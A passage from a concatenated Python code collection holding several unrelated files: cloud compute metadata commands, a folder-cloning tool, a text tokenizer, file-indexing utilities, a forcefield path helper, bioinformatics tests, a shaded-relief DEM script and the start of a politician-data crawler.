transformations=self.transformations))
for resource in resources:
yield resource
def Display(self, _, resources):
resource_printer.Print(
resources=resources,
print_format='yaml',
out=log.out)
class BaseMetadataAdder(ReadWriteCommand):
"""Base class for adding or modifying metadata entries."""
@staticmethod
def Args(parser):
metadata_utils.AddMetadataArgs(parser)
def Modify(self, args, existing):
new_object = copy.deepcopy(existing)
existing_metadata = getattr(existing, self.metadata_field, None)
setattr(
new_object,
self.metadata_field,
metadata_utils.ConstructMetadataMessage(
metadata=args.metadata,
metadata_from_file=args.metadata_from_file,
existing_metadata=existing_metadata))
if metadata_utils.MetadataEqual(
existing_metadata,
getattr(new_object, self.metadata_field, None)):
return None
else:
return new_object
def Run(self, args):
if not args.metadata and not args.metadata_from_file:
raise calliope_exceptions.ToolException(
'at least one of --metadata or --metadata-from-file must be provided')
return super(BaseMetadataAdder, self).Run(args)
class BaseMetadataRemover(ReadWriteCommand):
"""Base class for removing metadata entries."""
@staticmethod
def Args(parser):
group = parser.add_mutually_exclusive_group()
group.add_argument(
'--all',
action='store_true',
default=False,
help='If provided, all metadata entries are removed.')
group.add_argument(
'--keys',
help='The keys of the entries to remove.',
metavar='KEY',
nargs='+')
def Modify(self, args, existing):
new_object = copy.deepcopy(existing)
existing_metadata = getattr(existing, self.metadata_field, None)
setattr(new_object,
self.metadata_field,
metadata_utils.RemoveEntries(
existing_metadata=existing_metadata,
keys=args.keys,
remove_all=args.all))
if metadata_utils.MetadataEqual(
existing_metadata,
getattr(new_object, self.metadata_field, None)):
return None
else:
return new_object
def Run(self, args):
if not args.all and not args.keys:
raise calliope_exceptions.ToolException(
'one of --all or --keys must be provided')
return super(BaseMetadataRemover, self).Run(args)
class InstanceMetadataMutatorMixin(ReadWriteCommand):
"""Mixin for mutating instance metadata."""
@staticmethod
def Args(parser):
parser.add_argument(
'--zone',
help='The zone of the instance.',
required=True)
parser.add_argument(
'name',
metavar='NAME',
help='The name of the instance whose metadata should be modified.')
@property
def service(self):
return self.context['compute'].instances
@property
def metadata_field(self):
return 'metadata'
def GetGetRequest(self, args):
return (self.service,
'Get',
messages.ComputeInstancesGetRequest(
instance=args.name,
project=self.context['project'],
zone=args.zone))
def GetSetRequest(self, args, replacement, existing):
return (self.service,
'SetMetadata',
messages.ComputeInstancesSetMetadataRequest(
instance=args.name,
metadata=replacement.metadata,
project=self.context['project'],
zone=args.zone))
class InstanceTagsMutatorMixin(ReadWriteCommand):
"""Mixin for mutating instance tags."""
@staticmethod
def Args(parser):
parser.add_argument(
'--zone',
help='The zone of the instance.',
required=True)
parser.add_argument(
'name',
metavar='NAME',
help='The name of the instance whose tags should be modified.')
@property
def service(self):
return self.context['compute'].instances
def GetGetRequest(self, args):
return (self.service,
'Get',
messages.ComputeInstancesGetRequest(
instance=args.name,
project=self.context['project'],
zone=args.zone))
def GetSetRequest(self, args, replacement, existing):
return (self.service,
'SetTags',
messages.ComputeInstancesSetTagsRequest(
instance=args.name,
tags=replacement.tags,
project=self.context['project'],
zone=args.zone))
class ProjectMetadataMutatorMixin(ReadWriteCommand):
"""Mixin for mutating project-level metadata."""
@property
def service(self):
return self.context['compute'].projects
@property
def metadata_field(self):
return 'commonInstanceMetadata'
def GetGetRequest(self, args):
return (self.service,
'Get',
messages.ComputeProjectsGetRequest(
project=self.context['project']))
def GetSetRequest(self, args, replacement, existing):
return (self.service,
'SetCommonInstanceMetadata',
messages.ComputeProjectsSetCommonInstanceMetadataRequest(
metadata=replacement.commonInstanceMetadata,
project=self.context['project']))
_HELP = textwrap.dedent("""\
You can edit the resource below. Lines beginning with "#" are
ignored.
If you introduce a syntactic error, you will be given the
opportunity to edit the file again. You can abort by closing this
file without saving it.
At the bottom of this file, you will find an example resource.
Only fields that can be modified are shown. The original resource
with all of its fields is reproduced in the comment section at the
bottom of this document.
""")
def _SerializeDict(value, fmt):
"""Serializes value to either JSON or YAML."""
if fmt == 'json':
return json.dumps(
value,
indent=2,
sort_keys=True,
separators=(',', ': '))
else:
yaml.add_representer(
collections.OrderedDict,
yaml.dumper.SafeRepresenter.represent_dict,
Dumper=yaml.dumper.SafeDumper)
return yaml.safe_dump(
value,
indent=2,
default_flow_style=False,
width=70)
def _DeserializeValue(value, fmt):
"""Parses the given JSON or YAML value."""
if fmt == 'json':
return json.loads(value)
else:
return yaml.load(value)
def _WriteResourceInCommentBlock(serialized_resource, title, buf):
"""Outputs a comment block with the given serialized resource."""
buf.write('# ')
buf.write(title)
buf.write('\n# ')
buf.write('-' * len(title))
buf.write('\n#\n')
for line in serialized_resource.splitlines():
buf.write('#')
if line:
buf.write(' ')
buf.write(line)
buf.write('\n')
class BaseEdit(BaseCommand):
"""Base class for modifying resources using $EDITOR."""
__metaclass__ = abc.ABCMeta
@abc.abstractproperty
def service(self):
pass
@abc.abstractmethod
def GetGetRequest(self, args):
"""Returns a request for fetching the resource."""
@abc.abstractmethod
def GetSetRequest(self, args, replacement, existing):
"""Returns a request for setting the resource."""
@abc.abstractproperty
def example_resource(self):
pass
@staticmethod
def Args(parser):
format_arg = parser.add_argument(
'--format',
choices=['json', 'yaml'],
default='yaml',
help='The format to edit the resource in.')
format_arg.detailed_help = """\
The format to edit the resource in. Choices are ``json'' and ``yaml''.
"""
def ProcessEditedResource(self, file_contents, args):
"""Returns an updated resource that was edited by the user."""
# It's very important that we replace the characters of comment
# lines with spaces instead of removing the comment lines
# entirely. JSON and YAML deserialization give error messages
# containing line, column, and the character offset of where the
# error occurred. If the deserialization fails; we want to make
# sure those numbers map back to what the user actually had in
# front of him or her otherwise the errors will not be very
# useful.
non_comment_lines = '\n'.join(
' ' * len(line) if line.startswith('#') else line
for line in file_contents.splitlines())
modified_record = _DeserializeValue(non_comment_lines, args.format)
if self.modifiable_record == modified_record:
new_object = None
else:
modified_record['name'] = self.original_record['name']
fingerprint = self.original_record.get('fingerprint')
if fingerprint:
modified_record['fingerprint'] = fingerprint
new_object = encoding.DictToMessage(
modified_record, self._resource_spec.message_class)
# If existing object is equal to the proposed object or if
# there is no new object, then there is no work to be done, so we
# return the original object.
if not new_object or self.original_object == new_object:
return [self.original_object]
resources = list(request_helper.MakeRequests(
requests=[self.GetSetRequest(args, new_object, self.original_object)],
http=self.context['http'],
batch_url=self.context['batch-url']))
return resources
def Run(self, args):
get_request = self.GetGetRequest(args)
objects = list(request_helper.MakeRequests(
requests=[get_request],
http=self.context['http'],
batch_url=self.context['batch-url']))
self.original_object = objects[0]
self.original_record = encoding.MessageToDict(self.original_object)
# Selects only the fields that can be modified.
field_selector = property_selector.PropertySelector(
properties=self._resource_spec.editables)
self.modifiable_record = field_selector.Apply(self.original_record)
buf = cStringIO.StringIO()
for line in _HELP.splitlines():
buf.write('#')
if line:
buf.write(' ')
buf.write(line)
buf.write('\n')
buf.write('\n')
buf.write(_SerializeDict(self.modifiable_record, args.format))
buf.write('\n')
example = _SerializeDict(
encoding.MessageToDict(self.example_resource),
args.format)
_WriteResourceInCommentBlock(example, 'Example resource:', buf)
buf.write('#\n')
original = _SerializeDict(self.original_record, args.format)
_WriteResourceInCommentBlock(original, 'Original resource:', buf)
file_contents = buf.getvalue()
while True:
file_contents = edit.OnlineEdit(file_contents)
try:
resources = self.ProcessEditedResource(file_contents, args)
break
except (ValueError, yaml.error.YAMLError,
protorpc.messages.ValidationError,
calliope_exceptions.ToolException) as e:
if isinstance(e, ValueError):
message = e.message
else:
message = str(e)
if isinstance(e, calliope_exceptions.ToolException):
problem_type = 'applying'
else:
problem_type = 'parsing'
message = ('There was a problem {0} your changes: {1}'
.format(problem_type, message))
if not console_io.PromptContinue(
message=message,
prompt_string='Would you like to edit the resource again?'):
raise calliope_exceptions.ToolException('edit aborted by user')
resources = lister.ProcessResults(
resources=resources,
field_selector=property_selector.PropertySelector(
properties=None,
transformations=self.transformations))
for resource in resources:
yield resource
def Display(self, _, resources):
resource_printer.Print(
resources=resources,
print_format='yaml',
out=log.out)
| StarcoderdataPython |
4993239 | <gh_stars>0
from itertools import zip_longest
lista_a = [1,2,3,4,5,6,7]
lista_b = [1,2,3,4]
lista_soma = [n + n2 for n, n2 in zip_longest(lista_a,lista_b, fillvalue=0) ]
print(lista_soma) | StarcoderdataPython |
9763974 | from ltk.actions.action import *
class CloneAction(Action):
def __init__(self, path):
Action.__init__(self, path)
def clone_folders(self, dest_path, folders_map, locale, copy_root=False):
""" Copies subfolders of added folders to a particular destination folder (for a particular locale).
If there is more than one root folder to copy, each root folder is created inside of the destination folder.
If there is only one root folder to copy, only the subdirectories are copied."""
try:
# print("dest_path: "+str(dest_path))
# print("folders to clone: "+str(folders_map))
if not folders_map or not len(folders_map):
logger.warning("No folders to clone for locale "+str(locale)+".")
return
folder_created = False
prefix_folder = False
if not os.path.exists(dest_path):
os.mkdir(dest_path)
folder_created = True
if len(folders_map) > 1 or copy_root:
prefix_folder = True
for root_folder in folders_map:
# print("root folder: "+root_folder)
if prefix_folder:
new_root_path = dest_path + os.sep + root_folder
if not os.path.exists(new_root_path):
os.mkdir(new_root_path)
folder_created = True
for folder in folders_map[root_folder]:
new_sub_root_path = dest_path + os.sep + root_folder + os.sep + folder
if not os.path.exists(new_sub_root_path):
os.mkdir(new_sub_root_path)
folder_created = True
# print("created folder "+new_sub_root_path)
else:
if folders_map[root_folder]:
for folder in folders_map[root_folder]:
new_path = dest_path + os.sep + folder
if not os.path.exists(new_path):
os.mkdir(new_path)
folder_created = True
except IOError as e:
print(e.errno)
print(e)
if folder_created != True:
folder_created = False
# print("created folder "+ new_path)
return folder_created
def clone_action(self, folders, copy_root):
try:
if not len(self.watch_locales) or self.watch_locales == set(['[]']):
logger.warning("There are no locales for which to clone. You can add locales using 'ltk config -t'.")
return
folders_map = {}
are_added_folders = False
if not folders:
folders = self.folder_manager.get_file_names()
are_added_folders = True
for folder in folders:
folder_paths = folder.split(os.sep)
# print("current abs: "+str(self.get_current_abs(folder)))
if are_added_folders:
folder = os.path.join(self.path,folder)
# print("folder to be cloned: "+str(folder))
folders_map[folder_paths[len(folder_paths)-1]] = self.get_sub_folders(folder)
# print("folders: "+str(folders_map))
cloned_folders = False
for locale in self.watch_locales:
dest_path = ""
if locale in self.locale_folders:
dest_path = self.locale_folders[locale]
else:
if self.download_dir and self.download_dir != 'null':
dest_path = os.path.join(os.path.join(self.path,self.download_dir),locale)
else:
dest_path = os.path.join(self.path,locale)
dest_path = os.path.join(self.path,dest_path)
if self.clone_folders(dest_path, folders_map, locale, copy_root):
logger.info("Cloned locale " + str(locale) + " at " + dest_path)
cloned_folders = True
if not len(self.folder_manager.get_file_names()):
logger.warning("There are no added folders to clone.")
return
if not cloned_folders:
logger.info("All locales have already been cloned.")
return
except Exception as e:
log_error(self.error_file_name, e)
logger.error("Error on clean: "+str(e))
def get_sub_folders(self, patterns):
""" gets all sub-folders matching pattern from root
pattern supports any unix shell-style wildcards (not same as RE)
returns the relative paths starting from each pattern"""
cwd = os.getcwd()
if isinstance(patterns,str):
patterns = [patterns]
allPatterns = []
if isinstance(patterns,list) or isinstance(patterns,tuple):
for pattern in patterns:
# print("pattern in loop: "+str(pattern))
basename = os.path.basename(pattern)
if basename and basename != "":
allPatterns.extend(self.getRegexDirs(pattern,cwd))
else:
allPatterns.append(pattern)
else:
basename = os.path.basename(patterns)
if basename and basename != "":
allPatterns.extend(self.getRegexDirs(patterns,cwd))
else:
allPatterns.append(patterns)
matched_dirs = []
# print("all patterns: "+str(allPatterns))
for pattern in allPatterns:
path = os.path.abspath(pattern)
# print("looking at path "+str(path))
# check if pattern contains subdirectory
if os.path.exists(path):
if os.path.isdir(path):
for root, subdirs, files in os.walk(path):
split_path = root.split(os.sep)
for subdir in subdirs:
# print(os.path.join(root, subdir))
matched_dirs.append(os.path.join(root,subdir).replace(str(path)+os.sep,""))
else:
logger.info("Directory not found: "+pattern)
if len(matched_dirs) == 0:
return None
return matched_dirs
def getRegexDirs(self, pattern,path):
dir_name = os.path.dirname(pattern)
if dir_name:
path = os.path.join(path,dir_name)
pattern_name = os.path.basename(pattern)
# print("path: "+path)
# print("pattern: "+str(pattern))
matched_dirs = []
if pattern_name and not "*" in pattern:
return [pattern]
for path, subdirs, files in os.walk(path):
for dn in fnmatch.filter(subdirs, pattern):
matched_dirs.append(os.path.join(path, dn))
print("matched dirs: "+str(matched_dirs))
return matched_dirs
| StarcoderdataPython |
6640881 | <filename>documenthandler/dparser.py
#!/usr/bin/env python3
import hashlib
import logging
import os
import re
from documenthandler.dreader import DocumentReader
from utilities.consts import VALID_PUNCTUATION
from utilities.utils import remove_stop_words, remove_punct, lower_case_values
class DocumentParser:
def __init__(self, path_to_file: str):
logging.info('Parsing file.... %s' % (path_to_file))
if os.path.splitext(path_to_file)[1] != '.txt':
logging.error('File unsupported format.... %s' % path_to_file)
raise FileNotFoundError('File unsupported format....')
self.__file_name = os.path.basename(path_to_file)
self.__dreader = DocumentReader(path_to_file)
self.__doc_content = next(self.__dreader.read_doc())
self.__xml_entities = "&|"|'"
self.__file_hash = hashlib.sha1(self.__file_name.encode('utf-8')).hexdigest()
self.__words = []
#
# Regex:
# (?:http|ftp|https):\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+ -- URL
# [\d]+(?:\-|\/)[\d]+(?:\-|\/)[\d]+ -- date
# [\d.,]+ -- numbers with dot or comma (e.g: 1.20; 1,20)
# [A-Z][.A-Z]+\\b\\.* -- Job Titles (e.g: Dr.)
# w+[-']*\w+ -- hyphenated words (e.g: sugar-free)
# [^\s]+ -- everything except whitespace character
#
self.__regex_pattern = "(?:http|ftp|https):\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+|[\d]+(?:\-|\/)[\d]+(?:\-|\/)[\d]+|[\d.,]+|[A-Z][.A-Z]+\\b\\.*|\w+[-']*\w+|[^\s]+"
def __cleanup(self) -> list:
"""
Remove unwanted chars from the doc content.
Applies a regex to parse and tokenize text
:return: list of tokens
"""
# XML entities removal
altered_content = re.sub(self.__xml_entities, "", self.__doc_content)
altered_content = re.sub("<", "lower than", altered_content)
altered_content = re.sub(">", "greater than", altered_content)
# Multiple dots repetition. Replaced by one.
altered_content = re.sub(r'\.+', ".", altered_content)
# Characters repetition: 2+ times
for punct in iter(VALID_PUNCTUATION):
# URL exception
if punct != '\/':
altered_content = re.sub("[" + punct + "]{2,}", "", altered_content)
tokens = re.findall(pattern=self.__regex_pattern, string=altered_content)
# Remove tokens with puncts
tokens = remove_punct(tokens=tokens)
# Lower case content
tokens = lower_case_values(tokens=tokens)
# Remove stopwords
tokens = remove_stop_words(tokens=tokens)
return tokens
def document_id_hash(self) -> str:
"""
:return: document id hash
"""
return self.__file_hash
def document_name(self) -> str:
"""
:return: document id
"""
return self.__file_name
def process(self) -> None:
"""
Fires document parser
:return:
"""
logging.info('Processing file... %s' % (self.__file_name))
self.__words = self.__cleanup()
def words(self) -> list:
"""
:return: list of word from document
"""
return self.__words
| StarcoderdataPython |
8060699 | import os
import stat
import time
import json
import sys
import re
import hashlib
def calculateDirectorySizes( directory ):
size = 0
for name in directory:
fileId = directory[name]
if fileId['isDir']:
fileId['size'] = calculateDirectorySizes( fileId['children'] )
size += fileId['size']
return size
def filterDirectory( include, exclude, directory ):
newDirectory = {}
for name in directory:
fileId = directory[name]
if not checkExcludeFilter( exclude, fileId['path'] ):
continue
includeThis = checkIncludeFilter( include, fileId['path'] )
children = filterDirectory( include, exclude, fileId['children'] )
if not includeThis and not children:
continue
newDirectory[name] = {}
for key in fileId:
if key == 'children':
newDirectory[name][key] = children
else:
newDirectory[name][key] = fileId[key]
return newDirectory
def indexDirectory( directory ):
index = {}
for filename in directory:
fileId = directory[filename]
index[fileId['path']] = fileId
index.update( indexDirectory( fileId['children'] ) )
return index
def printIndexResult( index ):
print( '%i files (%s) and %i folders (%i non-empty) found.' % (
sum( not index[s]['isDir'] for s in index ),
formatBytes( sum( (index[s]['size'] if not index[s]['isDir'] else 0) for s in index ) ),
sum( index[s]['isDir'] for s in index ),
sum( index[s]['isDir'] and bool( index[s]['children'] ) for s in index ),
) )
def formatBytes( bytes ):
units = [ 'Byte', 'kB', 'MB', 'GB', 'TB' ]
i = 0
n = bytes
while i + 1 < len( units ) and n >= 1024.0:
n /= 1024.0
i += 1
return ('%.0f %s' if i == 0 else '%.2f %s') % (n, units[i])
def formatSeconds( seconds ):
units = [ 's', 'min', 'h', 'd', 'years' ]
factors = [ 60.0, 60.0, 24.0, 365.25 ]
assert( len(units) == len(factors)+1 )
i = 0
n = seconds
while i < len( factors ) and n >= factors[i]:
n /= factors[i]
i += 1
return '%.2f %s' % (n, units[i])
def checkIncludeFilter( include, path ):
if include and sum(1 for regex in include if regex.search( path )) == 0:
return False
return True
def checkExcludeFilter( exclude, path ):
if sum(1 for regex in exclude if regex.search( path )) > 0:
return False
return True
def rewritePaths( directory, oldRootLen, newRoot ):
for filename in directory:
fileId = directory[filename]
fileId['oriPath'] = fileId['path']
fileId['path'] = newRoot + fileId['path'][oldRootLen:]
rewritePaths( fileId['children'], oldRootLen, newRoot )
def getFileId( root, filename ):
path = os.path.join( root, filename )
try:
info = os.stat( path )
except OSError:
print( 'Could not access %s' % path )
return {
'name' : filename,
'path' : path,
'isDir' : False,
'modified' : 0,
'size' : 0
}
return {
'name' : filename,
'path' : path,
'isDir' : stat.S_ISDIR( info.st_mode ),
'modified' : info.st_mtime,
'size' : info.st_size
}
def getSources( patternList, commonRoot ):
if patternList is None:
return []
sources = []
rootSet = False
for source in patternList:
if '::' in source:
items = source.split( '::' )
assert len( items ) == 2
sources.append( (items[0], items[1]) )
else:
if rootSet:
print( "Error: you can only specifiy one new root; try to use pattern old:new." )
sys.exit( 1 )
sources.append( (commonRoot, source) )
rootSet = True
return sources
def hashFileContents( fileId, sources, contentHashes ):
oriPath = fileId['path'] if not ('oriPath' in fileId) else fileId['oriPath']
if not oriPath in contentHashes:
hasher = hashlib.sha1()
path = fileId['path']
for old, new in sources:
if path[:len(old)] == old:
path = new + path[len(old):]
break
try:
with open( path, 'rb' ) as f:
blocksize = 1024*1024*10
buf = f.read( blocksize )
while len( buf ) > 0:
hasher.update( buf )
buf = f.read( blocksize )
contentHashes[oriPath] = hasher.hexdigest()
except IOError:
print( 'Could not read %s' % path )
contentHashes[oriPath] = '0'
def isIncluded( fileId, includes ):
if fileId['path'] in includes:
return True
for include in includes:
if fileId['isDir'] and fileId['path'] + '/' == include[:len(fileId['path'])+1]: # parent dir of include
return True
if include + '/' == fileId['path'][:len(include)+1]: # child of include
return True
return False
def scanIntoMemory( root, onlyScan, skipScan ):
progress = {}
progress['lastOutput'] = time.time()
progress['counter'] = 0
return _scanIntoMemory( root, onlyScan, skipScan, progress )
def _scanIntoMemory( root, onlyScan, skipScan, progress ):
directory = {}
try:
dirlist = os.listdir( root )
except OSError:
print( 'Could not access %s' % root )
return directory
for filename in dirlist:
fileId = getFileId( root, filename )
if fileId['path'] in skipScan or (onlyScan and not isIncluded( fileId, onlyScan )):
continue
fileId['children'] = {}
if fileId['isDir']:
fileId['children'] = _scanIntoMemory( fileId['path'], onlyScan, skipScan, progress )
directory[filename] = fileId
progress['counter'] += 1
if time.time() - progress['lastOutput'] > 10:
print( '%i...' % progress['counter'] )
progress['lastOutput'] = time.time()
return directory
def scan( rootGiven, rewriteRoot, name, saveAs, args ):
root = os.path.abspath( rootGiven.replace( '\\', '/' ) )
if not os.path.isdir( root ):
if args.only or args.skip:
print( "Error: --only and --skip work only on directory scans." )
sys.exit( 1 )
if saveAs:
print( "Error: scan results can only be saved of directory scans." )
sys.exit( 1 )
if rewriteRoot:
rootRewritten = os.path.abspath( rewriteRoot.replace( '\\', '/' ) )
if os.path.isdir( root ):
if args.only:
onlyScan = set( map( lambda x: os.path.abspath( x.replace( '\\', '/' ) ), args.only ) )
else:
onlyScan = set()
if args.skip:
skipScan = set( map( lambda x: os.path.abspath( x.replace( '\\', '/' ) ), args.skip ) )
else:
skipScan = set()
if onlyScan & skipScan:
print( "Error: include and exclude lists have common items." )
sys.exit( 1 )
print( "scanning %s..." % (name if name else root) )
directory = scanIntoMemory( root, onlyScan, skipScan )
if saveAs:
print( "saving to %s..." % saveAs )
json.dump( directory, open( saveAs, 'w' ), indent = 4 )
elif os.path.isfile( root ):
print( "loading %s..." % (name if name else root) )
directory = json.load( open( root, 'r' ) )
else:
print( "Error: %s does not exist." % root )
sys.exit( 1 )
if args.exclude or args.include:
if args.exclude:
exclude = map( lambda pattern: re.compile( pattern ), args.exclude )
else:
exclude = []
if args.include:
include = map( lambda pattern: re.compile( pattern ), args.include )
else:
include = []
print( 'filtering data...' )
directory = filterDirectory( include, exclude, directory )
if not directory:
print( "Error: root filtered out." )
sys.exit( 1 )
print( 'calculating directory sizes...' )
calculateDirectorySizes( directory )
if rewriteRoot:
firstEntry = directory[list(directory.keys())[0]]
commonRoot = firstEntry['path'][: len( firstEntry['path'] ) - len( firstEntry['name'] ) ]
rewritePaths( directory, len(commonRoot)-1, rootRewritten )
firstEntry = directory[list(directory.keys())[0]]
commonRoot = firstEntry['path'][: len( firstEntry['path'] ) - len( firstEntry['name'] ) ]
index = indexDirectory( directory )
printIndexResult( index )
if name:
print( '%s root: %s' % (name, firstEntry['path'][:len(commonRoot)-1]) )
else:
print( 'root: %s' % firstEntry['path'][:len(commonRoot)-1] )
return directory, index, commonRoot | StarcoderdataPython |
267297 | <reponame>rashidulhasanhridoy/URI-Online-Judge-Problem-Solve-with-Python-3
names = []
for i in range(10):
X =str(input(''))
names.append(X)
print(names[2])
print(names[6])
print(names[8]) | StarcoderdataPython |
84731 | """Utilities to load forcefields based on forcefield names."""
import os
import foyer
def get_ff_path(
name: str = None,
):
"""Based on a forcefield name, it returns a path to that forcefield
Parameters
----------
name : str, default=None, optional
Forcefield file name to load.
"""
if name in ['oplsaa', 'trappe-ua']:
ff_path = name
return ff_path
elif os.path.splitext(name)[1] == '.xml':
ff_path = (
str(os.path.dirname(os.path.abspath(__file__))) + "/../xmls/" + name
)
return ff_path
else:
raise ValueError("ERROR: This force field is not 'oplsaa' or 'trappe-ua', or does "
"not have a .xml after it. "
)
def get_molecule_path(mol2_or_smiles_input):
"""Based on a forcefield name, it returns a path to that forcefield
Parameters
----------
mol2_or_smiles_input : str,
Whether to use a smiles string of mol2 file for the input. The mol2 file must
have the .mol2 extenstion or it will be read as a smiles string
Returns
----------
use_smiles : bool
True if using a smiles string, and False if a mol2 file
smiles_or_mol2_path_string : str
The smiles string or the mol2 file with its path
"""
if isinstance(mol2_or_smiles_input, str):
if os.path.splitext(mol2_or_smiles_input)[1] == '':
use_smiles = True
smiles_or_mol2_path_string = mol2_or_smiles_input
return [use_smiles, smiles_or_mol2_path_string]
elif os.path.splitext(mol2_or_smiles_input)[1] == '.mol2':
from src import xmls
use_smiles = False
smiles_or_mol2_path_string = (
str(os.path.dirname(os.path.abspath(__file__))) + "/../molecules/" + mol2_or_smiles_input
)
return [use_smiles, smiles_or_mol2_path_string]
else:
raise TypeError("ERROR: For the get_molecule_path function,"
"a smiles string or a mol2 file that does not have a .mol2 "
"file extension was not found.")
else:
raise TypeError("ERROR: A string was not entered or the get_molecule_path function.") | StarcoderdataPython |
6524562 | <gh_stars>10-100
#!/usr/bin/env python
from nose.tools import assert_equal, assert_true
import numpy as np
import pandas as p
import os
from Bio import SeqIO
from concoct.input import _normalize_per_sample, _normalize_per_contig, generate_feature_mapping, load_composition, _calculate_composition
class TestInput(object):
def setUp(self):
self.C = p.DataFrame(np.array([[0., 0.7], [5.5, .7]]))
def test_normalize_per_contig(self):
C_norm = _normalize_per_contig(self.C)
C_correct = p.DataFrame(np.array([[0., 1.],[5.5/6.2, 0.7/6.2]]))
assert_true(np.linalg.norm(C_norm-C_correct) < 0.0001)
def test_normalize_per_samples(self):
C_norm = _normalize_per_sample(self.C)
C_correct = p.DataFrame(np.array([[0., 0.5],[1,0.5]]))
assert_true(np.linalg.norm(C_norm-C_correct) < 0.0001)
def test_generate_feature_mapping(self):
feature_mapping, counter = generate_feature_mapping(2)
assert_equal(counter, 10)
assert_equal(len(list(feature_mapping.keys())), 16)
assert_true(('A', 'A') in feature_mapping)
def test_load_composition(self):
# Get the directory path of this test file
f = os.path.dirname(os.path.abspath(__file__))
# calculate the lengths of the contigs
seqs = SeqIO.parse("{0}/test_data/composition_some_shortened.fa".format(f),"fasta")
ids = []
lengths = []
for s in seqs:
if len(s) <= 1000:
continue
ids.append(s.id)
lengths.append(len(s))
c_len = p.Series(lengths,index=ids,dtype=float)
# Use load_composition to calculate contig lengths
composition, contig_lengths = load_composition("{0}/test_data/composition_some_shortened.fa".format(f),4,1000)
assert_equal(len(c_len), len(contig_lengths))
# All equal
for ix in ids:
assert_equal(c_len.loc[ix], contig_lengths.loc[ix])
def test__calculate_composition(self):
d = os.path.dirname(os.path.abspath(__file__))
f = "{0}/test_data/composition_some_shortened.fa".format(d)
seqs = SeqIO.parse(f, "fasta")
feature_mapping, counter = generate_feature_mapping(4)
seq_strings = {}
for i, s in enumerate(seqs):
seq_strings[s.id] = str(s.seq).upper()
composition, contig_lengths = _calculate_composition(f, 0, 4)
# Make sure the count is correct for one specific kmer
kmer_s = ('A', 'C', 'G', 'T')
for seq_id, s in seq_strings.items():
c = count_substrings(s, "".join(kmer_s))
assert_equal(composition.loc[seq_id, feature_mapping[kmer_s]], c+1)
# Check that non palindromic kmers works as well:
kmer_s = ('A', 'G', 'G', 'G')
reverse_kmer_s = ('C', 'C', 'C', 'T')
for seq_id, s in seq_strings.items():
c_1 = count_substrings(s, "".join(kmer_s))
c_2 = count_substrings(s, "".join(reverse_kmer_s))
assert_equal(composition.loc[seq_id, feature_mapping[kmer_s]], c_1 + c_2 + 1)
def count_substrings(s, subs):
# stolen from http://stackoverflow.com/a/19848382
# modified to count overlapping substrings as well
start = numBobs = 0
while start >= 0:
pos = s.find(subs, start)
if pos < 0:
break
numBobs += 1
start = pos + 1
return numBobs
| StarcoderdataPython |
11347526 | """
Creates a shaded relief ASCII grid
from an ASCII DEM. Also outputs
intermediate grids for slope and
aspect.
"""
# http://git.io/vYwUX
from linecache import getline
import numpy as np
# File name of ASCII digital elevation model
source = "dem.asc"
# File name of the slope grid
slopegrid = "slope.asc"
# File name of the aspect grid
aspectgrid = "aspect.asc"
# Output file name for shaded relief
shadegrid = "relief.asc"
# Shaded elevation parameters
# Sun direction
azimuth = 315.0
# Sun angle
altitude = 45.0
# Elevation exageration
z = 1.0
# Resolution
scale = 1.0
# No data value for output
NODATA = -9999
# Needed for numpy conversions
deg2rad = 3.141592653589793 / 180.0
rad2deg = 180.0 / 3.141592653589793
# Parse the header using a loop and
# the built-in linecache module
hdr = [getline(source, i) for i in range(1, 7)]
values = [float(h.split(" ")[-1].strip()) for h in hdr]
cols, rows, lx, ly, cell, nd = values
xres = cell
yres = cell * -1
# Load the dem into a numpy array
arr = np.loadtxt(source, skiprows=6)
# Exclude 2 pixels around the edges which are usually NODATA.
# Also set up structure for a 3x3 windows to process the slope
# throughout the grid
window = []
for row in range(3):
for col in range(3):
window.append(arr[row:(row + arr.shape[0] - 2),
col:(col + arr.shape[1] - 2)])
# Process each cell
x = ((z * window[0] + z * window[3] + z * window[3] + z * window[6]) -
(z * window[2] + z * window[5] + z * window[5] + z * window[8])) / \
(8.0 * xres * scale)
y = ((z * window[6] + z * window[7] + z * window[7] + z * window[8]) -
(z * window[0] + z * window[1] + z * window[1] + z * window[2])) / \
(8.0 * yres * scale)
# Calculate slope
slope = 90.0 - np.arctan(np.sqrt(x * x + y * y)) * rad2deg
# Calculate aspect
aspect = np.arctan2(x, y)
# Calculate the shaded relief
shaded = np.sin(altitude * deg2rad) * np.sin(slope * deg2rad) + \
np.cos(altitude * deg2rad) * np.cos(slope * deg2rad) * \
np.cos((azimuth - 90.0) * deg2rad - aspect)
shaded = shaded * 255
# Rebuild the new header
header = "ncols {}\n".format(shaded.shape[1])
header += "nrows {}\n".format(shaded.shape[0])
header += "xllcorner {}\n".format(lx + (cell * (cols - shaded.shape[1])))
header += "yllcorner {}\n".format(ly + (cell * (rows - shaded.shape[0])))
header += "cellsize {}\n".format(cell)
header += "NODATA_value {}\n".format(NODATA)
# Set no-data values
for pane in window:
slope[pane == nd] = NODATA
aspect[pane == nd] = NODATA
shaded[pane == nd] = NODATA
# Open the output file, add the header, save the slope grid
with open(slopegrid, "wb") as f:
f.write(bytes(header, 'UTF-8'))
np.savetxt(f, slope, fmt="%4i")
# Open the output file, add the header, save the slope grid
with open(aspectgrid, "wb") as f:
f.write(bytes(header, 'UTF-8'))
np.savetxt(f, aspect, fmt="%4i")
# Open the output file, add the header, save the array
with open(shadegrid, "wb") as f:
f.write(bytes(header, 'UTF-8'))
np.savetxt(f, shaded, fmt="%4i")
| StarcoderdataPython |
11387797 | <filename>opensanctions/crawlers/everypolitician.py<gh_stars>10-100
from datetime import datetime
from opensanctions import helpers as h
def crawl(context):
res = context.http.get(context.dataset.data.url)
for country in res.json():
for legislature in country.get("legislatures", []):
code = country.get("code").lower()
context.log.info("Country: %s" % code)
crawl_legislature(context, code, legislature)
# context.resolver.save()
def crawl_legislature(context, country, legislature):
lastmod = int(legislature.get("lastmod"))
lastmod = datetime.utcfromtimestamp(lastmod)
entities = {}
url = legislature.get("popolo_url")
res = context.http.get(url)
data = res.json()
for person in data.pop("persons", []):
parse_person(context, person, country, entities, lastmod)
for organization in data.pop("organizations", []):
parse_organization(context, organization, country, entities, lastmod)
events = data.pop("events", [])
events = {e.get("id"): e for e in events}
for membership in data.pop("memberships", []):
parse_membership(context, membership, entities, events)
def parse_common(context, entity, data, lastmod):
